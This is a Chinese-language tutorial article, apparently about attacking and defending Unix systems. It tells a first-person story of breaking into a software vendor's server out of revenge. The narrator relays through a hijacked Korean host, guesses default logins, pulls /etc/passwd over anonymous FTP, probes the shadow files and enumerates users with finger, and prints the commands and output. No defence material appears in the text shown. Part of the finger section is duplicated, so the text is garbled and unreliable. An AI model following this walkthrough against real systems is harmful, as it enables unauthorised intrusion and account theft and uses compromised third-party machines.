歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
您现在的位置: Linux教程網 >> UnixLinux >  >> Linux綜合 >> Linux資訊 >> 更多Linux

Unix系統的攻擊和防范

作者:· ·周侃··天極e企業    §.前言    這篇文章主要針對一些對網絡安全感興趣、同時又還不怎麼熟悉Unix入侵和防范的朋友們而寫的一篇文章。本文循序漸進地介紹了黑客攻擊Unix主機的主要方法和系統管理員如何針對這些方法進行有效的防御等。    §.Unix的特點    Unix能流行起來絕對不是偶然的,這跟Unix本身的特點之突出是分不開的特點,那就是:1、極強的可移植性;2、啟動異步進程的能力;3、一致的文件、設備和進程間I/O;5、層次化的文件系統;6、可用其它Shell來替代默認Shell的能力; 7、真正的多用戶和多任務。    列位注意,通常的Unix系統用戶有兩種:根用戶和普通用戶。    1.root——根用戶    這是SuperUser(超級用戶)的帳號,可以用這個帳號對本系統進行所有操作!獲得對系統的根訪問權限,也是黑客們拼命追求的終極目標。    2.普通用戶    給User(普通用戶)使用,具體權限由root分配的賬戶。可以有多個等級。黑客們多由此類賬戶開始試圖進入系統,如下例就是如此。    §.攻擊Unix系統的范例    先補了一些關於Unix的知識,下面我們要開始小試牛刀了。我們的攻擊平台是一台安裝了Redhat 6.0(內核版本2.2.5-15)的工作站(當然Win9x/Win2000上也可以試試啰!)。    聲明:本文中的目標主機的IP分別是202.202.0.8、202.103.10.110和211.50.33.117,以上IP純屬本人杜撰。如該IP所屬主機確實存在,則純屬巧合。    開始啦!    “又死機了!這是什麼爛東西?可惡!”我憤怒地猛擊鍵盤“還號稱全智能化軟件……給您‘身臨其境的美妙體驗'……,完全是放P!”我怒吼著。才買幾天的英語學習軟件就頻頻死機,而且花去了不菲的xxx大元人民幣,使我有一種徹底受騙的感覺。“你這個騙子,我非要給你點厲害看看,看你還到處騙人!”我一邊憤憤地叫著,一邊抄下了包裝盒上那個“騙子”軟件公司的網址:www.shitsoft.com.cn 。當夜無話。    第二天。忙了一早上,直到中午吃完中餐後才閒下來,眾人皆昏昏然欲見周公,我則坐到我的紅帽子旁,開始了正義的懲罰……    首先找一台Proxy,這樣就不會被反查法給抓到了。^_^ 不知原來那台韓國的“公雞”還在不在?試一試: bash# telnet 211.50.33.117 Red Hat Linux release 6.2 (Goozer) Kernel 2.2.14-5.0 on an i686 login:crossbow passWord: bash$    Ok! 還可以用,這麼長時間沒有理它,竟然還可以用!韓國的管理員真是太“好”了!^_^ 接著ping一下我們的目標,看看它長得啥模樣: bash$ pwd /home/crossbow bash$ ping www.shitsoft.com.cn Pinging www.shitsoft.com.cn [202.202.0.8] with 32 bytes of data: Reply from 202.202.0.8: bytes=32 time<10ms TTL=245 Reply from 202.202.0.8: bytes=32 time<10ms TTL=245 Reply from 202.202.0.8: bytes=32 time<10ms TTL=245 Reply from 202.202.0.8: bytes=32 time<10ms TTL=245 Ping statistics for 202.202.0.8: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms    速度不慢,看IP是中國教育網的機器,從TTL看估計是一台Unix。驗證一下:


bash$ telnet 202.202.0.8 SunOS 5.6 login:    呵呵,是一台SunOS 5.6的爛機器。先猜猜看: login:adm password: Login incorrect login:Oracle password: Login incorrect login:FTP password: Login incorrect ^C    可惡!今天火氣真差!一個沒猜到。:-( 用messala掃描一下看有沒有CGI漏洞:(略去復雜的掃描過程)………… 結果是滴水不漏!:-( 這個鳥管理員還挺勤快的…… 只好用nss看看它開了什麼服務吧!…………還好,telnet、ftp和finger的端口都打開了!^_^ 先看看有沒有匿名ftp賬戶: bash$ ftp 202.202.0.8 Connected to 202.202.0.8... 220 Cool FTP server(Version xxx Tue Dec 8 12:42:10 CDT 2001) ready. Name(202.202.0.8:FakeName):anonymous 331 Guest login ok,send you complete e-mail address as password. Password: 230:Welcome,archive user! ………… ………… ………… ftp>    還行,匿名ftp服務沒有關,竟然可以用anonymous賬戶進來了!趕緊抓他的passwd: ftp>ls ………… bin boot etc dev home lib usr proc lost+found root sbin src tmp usr var ………… ftp>cd /etc ………… ftp>ls *passwd* ………… passwd passwd- …………    不會如此簡單吧?看一看?: ftp>cat passwdmore ………… root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: telnet:x:71:8:Line Printer Admin:/usr/spool/lp: uUCp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: ftp:60001:60001:Ftp:/: noAccess:x:60002:60002:No Access User:/: nobody:x:65534:65534:SunOS 4.x Nobody:/: dennis:x:1005:20::/eXPort/home/dennis:/bin/sh walter:x:1001:100::/export/home/walter:/bin/sh power:x:9589:101::/export/home/power:/bin/sh deal:x:1035:20::/export/home/deal:/bin/sh jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh render:x:9591:101::/export/home/render:/bin/sh …………    倒霉,是個空的passwd!看看備份: ftp>cat passwd-more ………… root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/:

bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: telnet:x:71:8:Line Printer Admin:/usr/spool/lp: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: ftp:60001:60001:Ftp:/: noaccess:x:60002:60002:No Access User:/: nobody :x:65534:65534:SunOS 4.x Nobody:/: dennis:x:1005:20::/export/home/dennis:/bin/sh walter:x:1001:100::/export/home/walter:/bin/sh power:x:9589:101::/export/home/power:/bin/sh deal:x:1035:20::/export/home/deal:/bin/sh jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh render:x:9591:101::/export/home/render:/bin/sh …………    沒救了,一樣的!查查看有沒有shadow文件: ftp>ls *shadow* ………… shadow shadow- …………    哈哈,一般passwd是空的,那麼密碼就在shadow中! ftp>cat shadowmore ………… [sh$ cat shadowmore]: Permission denied …………    可惡,看都不讓看,試試備份文件: ftp>cat shadow-more ………… [sh$ cat shadow-more]: Permission denied …………    都一樣——不讓看!Faint! 只好可憐惜惜地把空passwd抓回來——有幾個用戶名總比沒有強吧? ftp>get passwd 226 Transfer complete. 540 bytes received in 0.55 seconds (1.8Kbytes/s) ftp>bye 221 Goodbye. bash$    研究一下,除去root和被關掉的賬號,還有七個可用賬號:dennis、walter、power、deal、jessica、smith和render,他們就是我們進入該主機最後的希望。^_^ finger上場! bash$ finger @202.202.0.8 [202.202.0.8 ] Login  Name      TTY Idle When Where daemon  ???               < . . . . > bin    ???               < . . . . > sys    ???               < . . . . > walter  Walter Wan   pts/0      202.202.0.114 ftp>bye 221 Goodbye. bash$    研究一下,除去root和被關掉的賬號,還有七個可用賬號:dennis、walter、power、deal、jessica、smith和render,他們就是我們進入該主機最後的希望。^_^ finger上場! bash$ finger @202.202.0.8 [202.202.0.8 ] Login  Name      TTY Idle When Where daemon  ???               < . . . . > bin    ???               < . . . . > sys    ???               < . . . . > walter  Walter Wan   pts/0      202.202.0.114



Copyright © Linux教程網 All Rights Reserved